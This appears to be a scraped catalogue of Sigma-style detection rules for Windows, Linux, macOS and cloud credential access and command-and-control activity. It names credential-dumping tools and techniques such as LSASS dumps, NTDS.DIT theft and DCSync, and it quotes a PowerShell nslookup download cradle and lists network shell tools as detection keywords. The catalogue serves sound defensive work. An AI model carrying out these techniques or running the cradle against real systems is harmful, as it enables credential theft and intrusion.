NTDS.DIT Creation By Uncommon ProcesshighDetects creation of a file named "ntds.dit" (Active Directory Database) by an uncommon process or a process located in a suspicious directory
NTDS Exfiltration Filename PatternshighDetects creation of files with specific name patterns seen used in various tools that export the NTDS.DIT for exfiltration.
Potential SAM Database DumphighDetects the creation of files that look like exports of the local SAM (Security Account Manager)
Suspicious PFX File CreationmediumA general detection for processes creating PFX files. This could be an indicator of an adversary exporting a local certificate to a PFX file.
LSASS Process Memory Dump Creation Via Taskmgr.EXEhighDetects the creation of an "lsass.dmp" file by the taskmgr process. This indicates a manual dumping of the LSASS.exe process memory using Windows Task Manager.
Suspicious Renamed Comsvcs DLL Loaded By Rundll32highDetects rundll32 loading a renamed comsvcs.dll to dump process memory
CredUI.DLL Loaded By Uncommon ProcessmediumDetects loading of "credui.dll" and related DLLs by an uncommon process. Attackers might leverage this DLL for potential use of "CredUIPromptForCredentials" or "CredUnPackAuthenticationBufferW".
Suspicious Unsigned Dbghelp/Dbgcore DLL LoadedhighDetects the load of dbghelp/dbgcore DLL (used to make memory dumps) by suspicious processes. Tools like ProcessHacker and some attacker tradecract use MiniDumpWriteDump API found in dbghelp.dll or dbgcore.dll. As an example, SilentTrynity C2 Framework has a module that leverages this API to dump the contents of Lsass.exe and transfer it over the network back to the attacker's machine.
Time Travel Debugging Utility Usage - ImagehighDetects usage of Time Travel Debugging Utility. Adversaries can execute malicious processes and dump processes, such as lsass.exe, via tttracer.exe.
Unsigned Image Loaded Into LSASS ProcessmediumLoading unsigned image (DLL, EXE) into LSASS process
Uncommon Outbound Kerberos ConnectionmediumDetects uncommon outbound network activity via Kerberos default port indicating possible lateral movement or first stage PrivEsc via delegation.
HackTool - Koh Default Named PipecriticalDetects creation of default named pipes used by the Koh tool
HackTool - Credential Dumping Tools Named Pipe CreatedcriticalDetects well-known credential dumping tools execution via specific named pipe creation
Suspicious Get-ADDBAccount UsagehighDetects suspicious invocation of the Get-ADDBAccount script that reads from a ntds.dit file and may be used to get access to credentials without using any credential dumpers
AADInternals PowerShell Cmdlets Execution - PsScripthighDetects ADDInternals Cmdlet execution. A tool for administering Azure AD and Office 365. Which can be abused by threat actors to attack Azure AD or Office 365.
Access to Browser Login DatamediumAdversaries may acquire credentials from web browsers by reading files specific to the target browser. Web browsers commonly save credentials such as website usernames and passwords so that they do not need to be entered manually in the future. Web browsers typically store the credentials in an encrypted format within a credential store.
Powershell Install a DLL in System DirectoryhighUses PowerShell to install/copy a file into a system directory such as "System32" or "SysWOW64"
Create Volume Shadow Copy with PowershellhighAdversaries may attempt to access or create a copy of the Active Directory domain database in order to steal credential information
Dump Credentials from Windows Credential Manager With PowerShellmediumAdversaries may search for common password storage locations to obtain user credentials. Passwords are stored in several places on a system, depending on the operating system or application holding the credentials.
Enumerate Credentials from Windows Credential Manager With PowerShellmediumAdversaries may search for common password storage locations to obtain user credentials. Passwords are stored in several places on a system, depending on the operating system or application holding the credentials.
Certificate Exported Via PowerShell - ScriptBlockmediumDetects calls to cmdlets inside of PowerShell scripts that are used to export certificates from the local certificate store. Threat actors were seen abusing this to steal private keys from compromised machines.
Suspicious Get-ADReplAccountmediumThe DSInternals PowerShell Module exposes several internal features of Active Directory and Azure Active Directory. These include FIDO2 and NGC key auditing, offline ntds.dit file manipulation, password auditing, DC recovery from IFM backups and password hash calculation.
HackTool - Rubeus Execution - ScriptBlockhighDetects the execution of the hacktool Rubeus using specific command line flags
HackTool - WinPwn Execution - ScriptBlockhighDetects scriptblock text keywords indicative of potential usge of the tool WinPwn. A tool for Windows and Active Directory reconnaissance and exploitation.
Potential Packet Capture Activity Via Start-NetEventSession - ScriptBlockmediumDetects the execution of powershell scripts with calls to the "Start-NetEventSession" cmdlet. Which allows an attacker to start event and packet capture for a network event session. Adversaries may attempt to capture network to gather information over the course of an operation. Data captured via this technique may include user credentials, especially those sent over an insecure, unencrypted protocol.
Potential Invoke-Mimikatz PowerShell ScripthighDetects Invoke-Mimikatz PowerShell script and alike. Mimikatz is a credential dumper capable of obtaining plaintext Windows account logins and passwords.
PowerShell Credential PrompthighDetects PowerShell calling a credential prompt
Request A Single Ticket via PowerShellhighutilize native PowerShell Identity modules to query the domain to extract the Service Principal Names for a single computer. This behavior is typically used during a kerberos or silver ticket attack. A successful execution will output the SPNs for the endpoint in question.
Extracting Information with PowerShellmediumAdversaries may search local file systems and remote file shares for files containing insecurely stored credentials. These can be files created by users to store their own credentials, shared credential stores for a group of individuals, configuration files containing passwords for a system or service, or source code/binary files containing embedded passwords.
PowerShell Get-Process LSASS in ScriptBlockhighDetects a Get-Process command on lsass process, which is in almost all cases a sign of malicious activity
Potential Keylogger ActivitymediumDetects PowerShell scripts that contains reference to keystroke capturing functions
Suspicious Connection to Remote AccountlowAdversaries with no prior knowledge of legitimate credentials within the system or environment may guess passwords to attempt access to accounts. Without knowledge of the password for an account, an adversary may opt to systematically guess the password using a repetitive or iterative mechanism
Veeam Backup Servers Credential Dumping Script ExecutionhighDetects execution of a PowerShell script that contains calls to the "Veeam.Backup" class, in order to dump stored credentials.
HackTool - Generic Process AccesshighDetects process access requests from hacktool processes based on their default image name
Lsass Memory Dump via Comsvcs DLLhighDetects adversaries leveraging the MiniDump export function from comsvcs.dll via rundll32 to perform a memory dump from lsass.
LSASS Memory Access by Tool With Dump Keyword In NamehighDetects LSASS process access requests from a source process with the "dump" keyword in its image name.
Potential Credential Dumping Activity Via LSASSmediumDetects process access requests to the LSASS process with specific call trace calls and access masks. This behaviour is expressed by many credential dumping tools such as Mimikatz, NanoDump, Invoke-Mimikatz, Procdump and even the Taskmgr dumping feature.
Credential Dumping Activity By Python Based ToolhighDetects LSASS process access for potential credential dumping by a Python-like tool such as LaZagne or Pypykatz.
Remote LSASS Process Access Through Windows Remote ManagementhighDetects remote access to the LSASS process via WinRM. This could be a sign of credential dumping from tools like mimikatz.
Suspicious LSASS Access Via MalSecLogonhighDetects suspicious access to LSASS handle via a call trace to "seclogon.dll" with a suspicious access right.
Potentially Suspicious GrantedAccess Flags On LSASSmediumDetects process access requests to LSASS process with potentially suspicious access flags
Credential Dumping Attempt Via WerFaulthighDetects process LSASS memory dump using Mimikatz, NanoDump, Invoke-Mimikatz, Procdump or Taskmgr based on the CallTrace pointing to ntdll.dll, dbghelp.dll or dbgcore.dll for win10, server2016 and up.
LSASS Access From Potentially White-Listed ProcesseshighDetects a possible process memory dump that uses a white-listed filename like TrolleyExpress.exe as a way to dump the LSASS process memory without Microsoft Defender interference
Potential Data Stealing Via Chromium Headless DebugginghighDetects chromium based browsers starting in headless and debugging mode and pointing to a user profile. This could be a sign of data stealing or remote control
Browser Started with Remote DebuggingmediumDetects browsers starting with the remote debugging flags. Which is a technique often used to perform browser injection attacks
Process Access via TrolleyExpress ExclusionhighDetects a possible process memory dump that uses the white-listed Citrix TrolleyExpress.exe filename as a way to dump the lsass process memory
New Generic Credentials Added Via Cmdkey.EXEmediumDetects usage of "cmdkey.exe" to add generic credentials. As an example, this can be used before connecting to an RDP session via command line interface.
Potential Reconnaissance For Cached Credentials Via Cmdkey.EXEhighDetects usage of cmdkey to look for cached credentials on the system
Copy .DMP/.DUMP Files From Remote Share Via Cmd.EXEhighDetects usage of the copy builtin cmd command to copy files with the ".dmp"/".dump" extension from a remote share
VolumeShadowCopy Symlink Creation Via MklinkhighShadow Copies storage symbolic link creation using operating systems utilities
Potential Windows Defender AV Bypass Via Dump64.EXE RenamehighDetects when a user is potentially trying to bypass the Windows Defender AV by renaming a tool to dump64.exe and placing it in the Visual Studio folder. Currently the rule is covering only usage of procdump but other utilities can be added in order to increase coverage.
Esentutl Gather CredentialsmediumConti recommendation to its affiliates to use esentutl to access NTDS dumped file. Trickbot also uses this utilities to get MSEdge info via its module pwgrab.
Copying Sensitive Files with Credential DatahighFiles with well-known filenames (sensitive files with credential data) copying
Findstr GPP PasswordshighLook for the encrypted cpassword value within Group Policy Preference files on the Domain Controller. This value can be decrypted with gpp-decrypt.
LSASS Process Reconnaissance Via Findstr.EXEhighDetects findstring commands that include the keyword lsass, which indicates recon actviity for the LSASS process PID
Permission Misconfiguration Reconnaissance Via Findstr.EXEmediumDetects usage of findstr with the "EVERYONE" or "BUILTIN" keywords. This was seen being used in combination with "icacls" and other utilities to spot misconfigured files or folders permissions.
HackTool - ADCSPwn ExecutionhighDetects command line parameters used by ADCSPwn, a tool to escalate privileges in an active directory network by coercing authenticate from machine accounts and relaying to the certificate service
HackTool - Certify ExecutionhighDetects Certify a tool for Active Directory certificate abuse based on PE metadata characteristics and common command line arguments.
HackTool - Certipy ExecutionhighDetects Certipy execution, a tool for Active Directory Certificate Services enumeration and abuse based on PE metadata characteristics and common command line arguments.
HackTool - CrackMapExec ExecutionhighThis rule detect common flag combinations used by CrackMapExec in order to detect its use even if the binary has been replaced.
HackTool - CrackMapExec Process PatternshighDetects suspicious process patterns found in logs when CrackMapExec is used
HackTool - CreateMiniDump ExecutionhighDetects the use of CreateMiniDump hack tool used to dump the LSASS process memory for credential extraction on the attacker's machine
HackTool - Dumpert Process Dumper ExecutioncriticalDetects the use of Dumpert process dumper, which dumps the lsass.exe process memory
Hacktool Execution - ImphashcriticalDetects the execution of different Windows based hacktools via their import hash (imphash) even if the files have been renamed
Hacktool Execution - PE MetadatahighDetects the execution of different Windows based hacktools via PE metadata (company, product, etc.) even if the files have been renamed
HackTool - HandleKatz LSASS Dumper ExecutionhighDetects the use of HandleKatz, a tool that demonstrates the usage of cloned handles to Lsass in order to create an obfuscated memory dump of the same
HackTool - Hashcat Password Cracker ExecutionhighExecute Hashcat.exe with provided SAM file from registry of Windows and Password list to crack against
HackTool - Hydra Password Bruteforce ExecutionhighDetects command line parameters used by Hydra password guessing hack tool
HackTool - Inveigh ExecutioncriticalDetects the use of Inveigh a cross-platform .NET IPv4/IPv6 machine-in-the-middle tool
HackTool - KrbRelay ExecutionhighDetects the use of KrbRelay, a Kerberos relaying tool
HackTool - KrbRelayUp ExecutionhighDetects KrbRelayUp used to perform a universal no-fix local privilege escalation in Windows domain environments where LDAP signing is not enforced
HackTool - RemoteKrbRelay ExecutionhighDetects the use of RemoteKrbRelay, a Kerberos relaying tool via CommandLine flags and PE metadata.
HackTool - LaZagne ExecutionmediumDetects the execution of the LaZagne. A utility used to retrieve multiple types of passwords stored on a local computer. LaZagne has been leveraged multiple times by threat actors in order to dump credentials.
HackTool - Mimikatz ExecutionhighDetection well-known mimikatz command line arguments
HackTool - Pypykatz Credentials Dumping ActivityhighDetects the usage of "pypykatz" to obtain stored credentials. Adversaries may attempt to extract credential material from the Security Account Manager (SAM) database through Windows registry where the SAM database is stored
HackTool - Quarks PwDump ExecutionhighDetects usage of the Quarks PwDump tool via commandline arguments
HackTool - Rubeus ExecutioncriticalDetects the execution of the hacktool Rubeus via PE information of command line parameters
HackTool - SafetyKatz ExecutioncriticalDetects the execution of the hacktool SafetyKatz via PE information and default Image name
HackTool - SecurityXploded ExecutioncriticalDetects the execution of SecurityXploded Tools
HackTool - Windows Credential Editor (WCE) ExecutioncriticalDetects the use of Windows Credential Editor (WCE)
HackTool - WinPwn ExecutionhighDetects commandline keywords indicative of potential usge of the tool WinPwn. A tool for Windows and Active Directory reconnaissance and exploitation.
Microsoft IIS Service Account Password DumpedhighDetects the Internet Information Services (IIS) command-line tool, AppCmd, being used to list passwords
Microsoft IIS Connection Strings DecryptionhighDetects use of aspnet_regiis to decrypt Microsoft IIS connection strings. An attacker with Microsoft IIS web server access via a webshell or alike can decrypt and dump any hardcoded connection strings, such as the MSSQL service account password using aspnet_regiis command.
Dumping Process via Sqldumper.exemediumDetects process dump via legitimate sqldumper.exe binary
Time Travel Debugging Utility UsagehighDetects usage of Time Travel Debugging Utility. Adversaries can execute malicious processes and dump processes, such as lsass.exe, via tttracer.exe.
Potential Credential Dumping Via LSASS Process ClonecriticalDetects a suspicious LSASS process process clone that could be a sign of credential dumping activity
New Network Trace Capture Started Via Netsh.EXEmediumDetects the execution of netsh with the "trace" flag in order to start a network capture
Harvesting Of Wifi Credentials Via Netsh.EXEmediumDetect the harvesting of wifi credentials using netsh.exe
Suspicious Usage Of Active Directory Diagnostic Tool (ntdsutil.exe)mediumDetects execution of ntdsutil.exe to perform different actions such as restoring snapshots...etc.
Invocation of Active Directory Diagnostic Tool (ntdsutil.exe)mediumDetects execution of ntdsutil.exe, which can be used for various attacks against the NTDS database (NTDS.DIT)
PktMon.EXE ExecutionmediumDetects execution of PktMon, a tool that captures network packets.
AADInternals PowerShell Cmdlets Execution - ProccessCreationhighDetects ADDInternals Cmdlet execution. A tool for administering Azure AD and Office 365. Which can be abused by threat actors to attack Azure AD or Office 365.
Certificate Exported Via PowerShellmediumDetects calls to cmdlets that are used to export certificates from the local certificate store. Threat actors were seen abusing this to steal private keys from compromised machines.
PowerShell Get-Process LSASShighDetects a "Get-Process" cmdlet and it's aliases on lsass process, which is in almost all cases a sign of malicious activity
PowerShell SAM CopyhighDetects suspicious PowerShell scripts accessing SAM hives
PUA - DIT Snapshot ViewerhighDetects the use of Ditsnap tool, an inspection tool for Active Directory database, ntds.dit.
PUA - Mouse Lock ExecutionmediumIn Kaspersky's 2020 Incident Response Analyst Report they listed legitimate tool "Mouse Lock" as being used for both credential access and collection in security incidents.
PUA - WebBrowserPassView ExecutionmediumDetects the execution of WebBrowserPassView.exe. A password recovery tool that reveals the passwords stored by the following Web browsers, Internet Explorer (Version 4.0 - 11.0), Mozilla Firefox (All Versions), Google Chrome, Safari, and Opera
Process Memory Dump via RdrLeakDiag.EXEhighDetects the use of the Microsoft Windows Resource Leak Diagnostic tool "rdrleakdiag.exe" to dump process memory
Enumeration for 3rd Party Creds From CLImediumDetects processes that query known 3rd party registry keys that holds credentials via commandline
Potential Credential Dumping Attempt Using New NetworkProvider - CLIhighDetects when an attacker tries to add a new network provider in order to dump clear text credentials, similar to how the NPPSpy tool does it
Dropping Of Password Filter DLLmediumDetects dropping of dll files in system32 that may be used to retrieve user credentials from LSASS
Dumping of Sensitive Hives Via Reg.EXEhighDetects the usage of "reg.exe" in order to dump sensitive registry hives. This includes SAM, SYSTEM and SECURITY hives.
Suspicious Reg Add Open CommandmediumThreat actors performed dumping of SAM, SECURITY and SYSTEM registry hives using DelegateExecute key
Enumeration for Credentials in RegistrymediumAdversaries may search the Registry on compromised systems for insecurely stored credentials. The Windows Registry stores configuration information that can be used by the system or other programs. Adversaries may query the Registry looking for credentials and passwords that have been stored for use by other programs or services
Capture Credentials with Rpcping.exemediumDetects using Rpcping.exe to send a RPC test connection to the target server (-s) and force the NTLM hash to be sent in the process.
Suspicious Key Manager AccesshighDetects the invocation of the Stored User Names and Passwords dialogue (Key Manager)
Suspicious NTLM Authentication on the Printer Spooler ServicehighDetects a privilege elevation attempt by coercing NTLM authentication on the Printer Spooler service
Process Memory Dump Via Comsvcs.DLLhighDetects a process memory dump via "comsvcs.dll" using rundll32, covering multiple different techniques (ordinal, minidump function, etc.)
Potential Suspicious Activity Using SeCEditmediumDetects potential suspicious behaviour using secedit.exe. Such as exporting or modifying the security policy
Suspicious Serv-U Process PatternhighDetects a suspicious process pattern which could be a sign of an exploited Serv-U service
Potential SPN Enumeration Via Setspn.EXEmediumDetects service principal name (SPN) enumeration used for Kerberoasting
SQLite Chromium Profile Data DB AccesshighDetect usage of the "sqlite" binary to query databases in Chromium-based browsers for potential data stealing.
SQLite Firefox Profile Data DB AccesshighDetect usage of the "sqlite" binary to query databases in Firefox and other Gecko-based browsers for potential data stealing.
Automated Collection Command PromptmediumOnce established within a system or network, an adversary may use automated techniques for collecting internal data.
Potential Browser Data StealingmediumAdversaries may acquire credentials from web browsers by reading files specific to the target browser. Web browsers commonly save credentials such as website usernames and passwords so that they do not need to be entered manually in the future. Web browsers typically store the credentials in an encrypted format within a credential store.
Potentially Suspicious EventLog Recon Activity Using Log Query UtilitiesmediumDetects execution of different log query utilities and commands to search and dump the content of specific event logs or look for specific event IDs. This technique is used by threat actors in order to extract sensitive information from events logs such as usernames, IP addresses, hostnames, etc.
Potentially Suspicious JWT Token Search Via CLImediumDetects possible search for JWT tokens via CLI by looking for the string "eyJ0eX" or "eyJhbG". This string is used as an anchor to look for the start of the JWT token used by microsoft office and similar apps.
LSASS Dump Keyword In CommandLinehighDetects the presence of the keywords "lsass" and ".dmp" in the commandline, which could indicate a potential attempt to dump or create a dump of the lsass process.
Potential Network Sniffing Activity Using Network ToolsmediumDetects potential network sniffing via use of network tools such as "tshark", "windump". Network sniffing refers to using the network interface on a system to monitor or capture information sent over a wired or wireless connection. An adversary may place a network interface into promiscuous mode to passively access data in transit over the network, or use span ports to capture a larger amount of data.
Suspicious Process Patterns NTDS.DIT ExfilhighDetects suspicious process patterns used in NTDS.DIT exfiltration
Private Keys Reconnaissance Via CommandLine ToolsmediumAdversaries may search for private key certificate files on compromised systems for insecurely stored credential
Shadow Copies Creation Using Operating Systems UtilitiesmediumShadow Copies creation using operating systems utilities, possible credential access
Suspicious SYSTEM User Process CreationhighDetects a suspicious process creation as SYSTEM user (suspicious program or command line parameter)
Suspicious SYSVOL Domain Group Policy AccessmediumDetects Access to Domain Group Policies stored in SYSVOL
Active Directory Database Snapshot Via ADExplorermediumDetects the execution of Sysinternals ADExplorer with the "-snapshot" flag in order to save a local copy of the active directory database.
Suspicious Active Directory Database Snapshot Via ADExplorerhighDetects the execution of Sysinternals ADExplorer with the "-snapshot" flag in order to save a local copy of the active directory database to a suspicious directory.
Potential LSASS Process Dump Via ProcdumphighDetects suspicious uses of the SysInternals Procdump utility by using a special command line parameter in combination with the lsass.exe process. This way we are also able to catch cases in which the attacker has renamed the procdump executable.
Potentially Suspicious Command Targeting Teams Sensitive FilesmediumDetects a commandline containing references to the Microsoft Teams database or cookies files from a process other than Teams. The database might contain authentication tokens and other sensitive information about the logged in accounts.
Windows Credential Manager Access via VaultCmdmediumList credentials currently stored in Windows Credential Manager via the native Windows utility vaultcmd.exe
Sensitive File Dump Via Wbadmin.EXEhighDetects the dump of highly sensitive files such as "NTDS.DIT" and "SECURITY" hive. Attackers can leverage the "wbadmin" utility in order to dump sensitive files that might contain credential or sensitive information.
Sensitive File Recovery From Backup Via Wbadmin.EXEhighDetects the dump of highly sensitive files such as "NTDS.DIT" and "SECURITY" hive. Attackers can leverage the "wbadmin" utility in order to dump sensitive files that might contain credential or sensitive information.
Potential Credential Dumping Via WERhighDetects potential credential dumping via Windows Error Reporting LSASS Shtinkering technique which uses the Windows Error Reporting to dump lsass
Potential Windows Defender Tampering Via Wmic.EXEhighDetects potential tampering with Windows Defender settings such as adding exclusion using wmic
Esentutl Volume Shadow Copy Service KeyshighDetects the volume shadow copy service initialization and processing via esentutl. Registry keys such as HKLM\\System\\CurrentControlSet\\Services\\VSS\\Diag\\VolSnap\\Volume are captured.
Windows Credential Editor RegistrycriticalDetects the use of Windows Credential Editor (WCE)
Potential Credential Dumping Via LSASS SilentProcessExit TechniquecriticalDetects changes to the Registry in which a monitor program gets registered to dump the memory of the lsass.exe process
Lsass Full Dump Request Via DumpType Registry SettingshighDetects the setting of the "DumpType" registry value to "2" which stands for a "Full Dump". Technique such as LSASS Shtinkering requires this value to be "2" in order to dump LSASS.
Potential Credential Dumping Attempt Using New NetworkProvider - REGmediumDetects when an attacker tries to add a new network provider in order to dump clear text credentials, similar to how the NPPSpy tool does it
NotPetya Ransomware ActivitycriticalDetects NotPetya ransomware activity in which the extracted passwords are passed back to the main module via named pipe, the file system journal of drive C is deleted and Windows eventlogs are cleared using wevtutil
APT31 Judgement Panda ActivitycriticalDetects APT31 Judgement Panda activity as described in the Crowdstrike 2019 Global Threat Report
Potential Russian APT Credential Theft ActivitycriticalDetects Russian group activity as described in Global Threat Report 2019 by Crowdstrike
GALLIUM IOCshighDetects artifacts associated with GALLIUM cyber espionage group as reported by Microsoft Threat Intelligence Center in the December 2019 report.
GALLIUM Artefacts - BuiltinhighDetects artefacts associated with activity group GALLIUM - Microsoft Threat Intelligence Center indicators released in December 2019.
CVE-2021-31979 CVE-2021-33771 Exploits by SourgumcriticalDetects patterns as noticed in exploitation of Windows CVE-2021-31979 CVE-2021-33771 vulnerability and DevilsTongue malware by threat group Sourgum
CVE-2021-31979 CVE-2021-33771 ExploitscriticalDetects patterns as noticed in exploitation of Windows CVE-2021-31979 CVE-2021-33771 vulnerability and DevilsTongue malware by threat group Sourgum
Potential CVE-2021-42278 Exploitation AttemptmediumThe attacker creates a computer object using those permissions with a password known to her. After that she clears the attribute ServicePrincipalName on the computer object. Because she created the object (CREATOR OWNER), she gets granted additional permissions and can do many changes to the object.
CVE-2023-23397 Exploitation AttemptcriticalDetects outlook initiating connection to a WebDAV or SMB share, which could be a sign of CVE-2023-23397 exploitation.
Okta 2023 Breach Indicator Of CompromisemediumDetects new user account creation or activation with specific names related to the Okta Support System 2023 breach. This rule can be enhanced by filtering out known and legitimate username used in your environnement.
User with Privileges LogonlowDetects logon with "Special groups" and "Special Privileges" can be thought of as Administrator groups or privileges.
Remote Registry Management Using Reg UtilitymediumRemote registry management using REG utility from non-admin workstation
Okta Password Health Report QuerylowDetects all activities against the endpoint "/reports/password-health/*" which should only be accessed via OKTA Admin Console UI. Use this rule to hunt for potential suspicious requests. Correlate this event with "admin console" login and alert on requests without any corresponding admin console login
Clipboard Data Collection Via PbpastemediumDetects execution of the "pbpaste" utility, which retrieves the contents of the clipboard (a.k.a. pasteboard) and writes them to the standard output (stdout). The utility is often used for creating new files with the clipboard content or for piping clipboard contents to other commands. It can also be used in shell scripts that may require clipboard content as input. Attackers can abuse this utility in order to collect data from the user clipboard, which may contain passwords or sensitive information. Use this rule to hunt for potential abuse of the utility by looking at the parent process and any potentially suspicious command line content.
Access To Browser Credential Files By Uncommon Applications - SecuritylowDetects file access requests to browser credential stores by uncommon processes. Could indicate potential attempt of credential stealing This rule requires heavy baselining before usage.
Access To Browser Credential Files By Uncommon ApplicationslowDetects file access requests to browser credential stores by uncommon processes. Could indicate potential attempt of credential stealing. Requires heavy baselining before usage
Access To Chromium Browsers Sensitive Files By Uncommon ApplicationslowDetects file access requests to chromium based browser sensitive files by uncommon processes. Could indicate potential attempt of stealing sensitive information.
Access To Sysvol Policies Share By Uncommon ProcessmediumDetects file access requests to the Windows Sysvol Policies Share by uncommon processes
Unattend.XML File Access AttemptlowDetects attempts to access the "unattend.xml" file, where credentials might be stored. This file is used during the unattended windows install process.
Dbghelp/Dbgcore DLL Loaded By Uncommon/Suspicious ProcessmediumDetects the load of dbghelp/dbgcore DLL by a potentially uncommon or potentially suspicious process. The Dbghelp and Dbgcore DLLs export functions that allow for the dump of process memory. Tools like ProcessHacker, Task Manager and some attacker tradecraft use the MiniDumpWriteDump API found in dbghelp.dll or dbgcore.dll. As an example, SilentTrynity C2 Framework has a module that leverages this API to dump the contents of Lsass.exe and transfer it over the network back to the attacker's machine. Keep in mind that many legitimate Windows processes and services might load the aforementioned DLLs for debugging or other related purposes. Investigate the CommandLine and the Image location of the process loading the DLL.
Potential Credential Dumping Attempt Via PowerShellmediumDetects a PowerShell process requesting access to "lsass.exe", which can be indicative of potential credential dumping attempts
LSASS Access From Program In Potentially Suspicious FoldermediumDetects process access to LSASS memory with suspicious access flags and from a potentially suspicious folder
Uncommon GrantedAccess Flags On LSASSmediumDetects process access to LSASS memory with uncommon access flags 0x410 and 0x01410
Potential Password Reconnaissance Via Findstr.EXEmediumDetects command line usage of "findstr" to search for the "passwords" keyword in a variety of different languages
EventLog Query Requests By Builtin UtilitiesmediumDetect attempts to query the contents of the event log using command line utilities. Attackers use this technique in order to look for sensitive information in the logs such as passwords, usernames, IPs, etc.
Sign-in Failure Bad Password ThresholdhighDefine a baseline threshold and then monitor and adjust to suit your organizational behaviors and limit false alerts from being generated.
Failed Logins with Different Accounts from Single Source - LinuxmediumDetects suspicious failed logins with different user accounts from a single source system
Mimikatz In-MemorymediumDetects certain DLL loads when Mimikatz gets executed
Stored Credentials in Fake FileshighSearch for accessing of fake files with stored credentials
Dumping ntds.dit remotely via DCSyncmediumntds.dit retrieving using synchronisation with legitimate domain controller using Directory Replication Service Remote Protocol
Dumping ntds.dit remotely via NetSyncmediumntds.dit retrieving (only computer accounts) using synchronisation with legit domain controller using Netlogon Remote Protocol
Possible Remote Password Change Through SAMRmediumDetects a possible remote NTLM hash change through SAMR API SamiChangePasswordUser() or SamSetInformationUser(). "Audit User Account Management" in "Advanced Audit Policy Configuration" has to be enabled in your local security policy / GPO to see this events.
attack.command_and_control 271
Show Rules (271)
Title Level Description
Domestic Kitten FurBall Malware PatternhighDetects specific malware patterns used by FurBall malware linked to Iranian Domestic Kitten APT group
CobaltStrike Malleable Amazon Browsing Traffic ProfilehighDetects Malleable Amazon Profile
CobaltStrike Malformed UAs in Malleable ProfilescriticalDetects different malformed user agents used in Malleable Profiles used with Cobalt Strike
CobaltStrike Malleable (OCSP) ProfilehighDetects Malleable (OCSP) Profile with Typo (OSCP) in URL
CobaltStrike Malleable OneDrive Browsing Traffic ProfilehighDetects Malleable OneDrive Profile
Microsoft Binary Github CommunicationhighDetects an executable in the Windows folder accessing github.com
Suspicious Non-Browser Network Communication With Reddit APImediumDetects an a non-browser process interacting with the Reddit API which could indicate use of a covert C2 such as RedditC2
Netcat The Powershell Version - PowerShell ModulemediumAdversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network
GALLIUM ArtefactshighDetects artefacts associated with activity group GALLIUM - Microsoft Threat Intelligence Center indicators released in December 2019.
Suspicious Certutil Command UsagehighDetects a suspicious Microsoft certutil execution with sub commands like 'decode' sub command, which is sometimes used to decode malicious code
DNS Tunnel Technique from MuddyWatercriticalDetecting DNS tunnel activity for Muddywater actor
Suspicious File Download Using Office ApplicationhighDetects the usage of one of three Microsoft office applications (Word, Excel, PowerPoint) to download arbitrary files
Nslookup PwSh Download CradlemediumThis rule tries to detect powershell download cradles, e.g. powershell . (nslookup -q=txt http://some.owned.domain.com)[-1]
Windows Update Client LOLBINhighDetects code execution via the Windows Update client (wuauclt)
OpenCanary - Telnet Login AttempthighDetects instances where a Telnet service on an OpenCanary node has had a login attempt.
Antivirus Exploitation Framework DetectioncriticalDetects a highly relevant Antivirus alert that reports an exploitation framework. This event must not be ignored just because the AV has blocked the malware but investigate, how it came there in the first place.
Malicious IP Address Sign-In Failure RatehighIndicates sign-in from a malicious IP address based on high failure rates.
Malicious IP Address Sign-In SuspicioushighIndicates sign-in from a malicious IP address known to be malicious at time of sign-in.
Sign-In From Malware Infected IPhighIndicates sign-ins from IP addresses infected with malware that is known to actively communicate with a bot server.
Activity from Suspicious IP AddressesmediumDetects when a Microsoft Cloud App Security reported users were active from an IP address identified as risky by Microsoft Threat Intelligence. These IP addresses are involved in malicious activities, such as Botnet C&C, and may indicate compromised account.
Activity from Anonymous IP AddressesmediumDetects when a Microsoft Cloud App Security reported when users were active from an IP address that has been identified as an anonymous proxy IP address.
Activity from Infrequent CountrymediumDetects when a Microsoft Cloud App Security reported when an activity occurs from a location that wasn't recently or never visited by any user in the organization.
Okta Security Threat DetectedmediumDetects when an security threat is detected in Okta.
Suspicious C2 ActivitiesmediumDetects suspicious activities as declared by Florian Roth in its 'Best Practice Auditd Configuration'. This includes the detection of the following commands; wget, curl, base64, nc, netcat, ncat, ssh, socat, wireshark, rawshark, rdesktop, nmap. These commands match a few techniques from the tactics "Command and Control", including not exhaustively the following; Application Layer Protocol (T1071), Non-Application Layer Protocol (T1095), Data Encoding (T1132)
Remote File CopylowDetects the use of tools that copy files from or to remote systems
Wget Creating Files in Tmp DirectorymediumDetects the use of wget to download content in a temporary directory such as "/tmp" or "/var/tmp"
Communication To Ngrok Tunneling Service - LinuxhighDetects an executable accessing an ngrok tunneling endpoint, which could be a sign of forbidden exfiltration of data exfiltration by malicious actors
Communication To LocaltoNet Tunneling Service Initiated - LinuxhighDetects an executable initiating a network connection to "LocaltoNet" tunneling sub-domains. LocaltoNet is a reverse proxy that enables localhost services to be exposed to the Internet. Attackers have been seen to use this service for command-and-control activities to bypass MFA and perimeter controls.
Potentially Suspicious Malware Callback Communication - LinuxhighDetects programs that connect to known malware callback ports based on threat intelligence reports.
Curl Usage on LinuxlowDetects a curl process start on linux, which indicates a file download from a remote location or a simple web request to a remote server
Potential Linux Amazon SSM Agent HijackingmediumDetects potential Amazon SSM agent hijack attempts as outlined in the Mitiga research report.
Suspicious Curl Change User Agents - LinuxmediumDetects a suspicious curl process start on linux with set useragent options
Download File To Potentially Suspicious Directory Via WgetmediumDetects the use of wget to download content to a suspicious directory
Suspicious Installer Package Child ProcessmediumDetects the execution of suspicious child processes from macOS installer package parent process. This includes osascript, JXA, curl and wget amongst other interpreters
File Download Via Nscurl - MacOSmediumDetects the execution of the nscurl utility in order to download files.
Potential In-Memory Download And Compile Of PayloadsmediumDetects potential in-memory downloading and compiling of applets using curl and osacompile as seen used by XCSSET malware
Potential WizardUpdate Malware InfectionhighDetects the execution traces of the WizardUpdate malware. WizardUpdate is a macOS trojan that attempts to infiltrate macOS machines to steal data and it is associated with other types of malicious payloads, increasing the chances of multiple infections on a device.
Potential XCSSET Malware InfectionmediumIdentifies the execution traces of the XCSSET malware. XCSSET is a macOS trojan that primarily spreads via Xcode projects and maliciously modifies applications. Infected users are also vulnerable to having their credentials, accounts, and other vital data stolen.
Cisco Stage DatalowVarious protocols maybe used to put data on the device for exfil or infil
Cobalt Strike DNS BeaconingcriticalDetects suspicious DNS queries known from Cobalt Strike beacons
Suspicious DNS Query with B64 Encoded StringmediumDetects suspicious DNS queries using base64 encoding
Telegram Bot API RequestmediumDetects suspicious DNS queries to api.telegram.org used by Telegram Bots of any kind
DNS TXT Answer with Possible Execution StringshighDetects strings used in command execution in DNS TXT Answer
